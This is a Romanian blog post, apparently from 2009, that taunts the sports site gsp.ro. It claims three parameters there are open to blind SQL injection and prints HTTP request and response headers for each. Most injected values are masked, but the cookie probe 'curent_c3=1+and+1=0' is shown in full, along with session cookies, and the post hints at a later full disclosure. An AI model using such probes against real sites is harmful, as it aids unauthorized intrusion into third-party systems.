Daca saptamana trecuta imaginatia debordanta a celor de la GSP ne delecta cu un hack simulat, iata ca baietii merg mai departe cu imaginatia si ne ofera si alte detalii picante :
Presupunem ca avem 3 parametri :section, search[text] si curent_c3, toti 3 in sectiunea cautare de pe site-ul gsp.ro…
I-a ghiciti voi la ce sunt vulnerabili cei 3 muschetari? Ati ghicit… la blind sql injection… Nu dam amanunte, pentru ca inca nu avem motive.. si apoi… ce s-ar face sportul romanesc fara gsp? 
Totusi, pentru ca ne plac picanteriile, hai sa vedem request-ul raspunsul header-ului in cele 3 cazuri:
Parametru : section (GET)
Header request:
GET http://www.gsp.ro/?section=cautare'+*****+'********&limba=rom&search[text]=********* HTTP/1.1
Host: www.gsp.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: POPUPCHECK=1242387861723;PHPSESSID=8376e9f5e950cab16a992de62207a5e1;cresist=592FF71F00000050;curent_c2=2;curent=1;curent_c3=1
Raspunsul:
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Vary: User-Agent, Accept, Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
Content-Type: text/html
Date: Tue, 19 May 2009 09:48:31 GMT
Server: DigitalIT HTTPD 2.02
Via: CN-5000
Connection: Keep-Alive
Parametru :search[text] (GET)
Request header:
GET http://www.gsp.ro/?section=cautare&limba=rom&********=*****'****'******* HTTP/1.1
Host: www.gsp.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: POPUPCHECK=1242387861723;PHPSESSID=8376e9f5e950cab16a992de62207a5e1;cresist=592FF71F00000050;curent_c2=2;curent=1;curent_c3=1
´Raspunsul header-ului:
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Vary: User-Agent, Accept, Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
Content-Type: text/html
Date: Tue, 19 May 2009 09:49:09 GMT
Server: DigitalIT HTTPD 2.02
Via: CN-5000
Connection: Keep-Alive
Ultimul parametru : curent_c3 (cookie)
Request header:
GET http://www.gsp.ro/?section=********=********* HTTP/1.1
Host: www.gsp.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: POPUPCHECK=1242387861723;PHPSESSID=8376e9f5e950cab16a992de62207a5e1;cresist=592FF71F00000050;curent_c2=2;curent=1;curent_c3=1+and+1%3D0
Raspunsul header-ului:
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Vary: User-Agent, Accept, Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
Content-Type: text/html
Date: Tue, 19 May 2009 09:51:17 GMT
Server: DigitalIT HTTPD 2.02
Via: CN-5000
Connection: Keep-Alive
Acum…dupa o asemenea conversatie cu serverul gps, mai am un singur dor:
…in linistea serii… sa-i intreb pe baietii de la gps.ro, daca mai au si alta calificare, exceptand-o pe cea de admin… poate vor avea nevoi intr-o buna zi…
Deocamdata, din motive evidente, nu facem full disclosure, dar nu se stie niciodata…:)
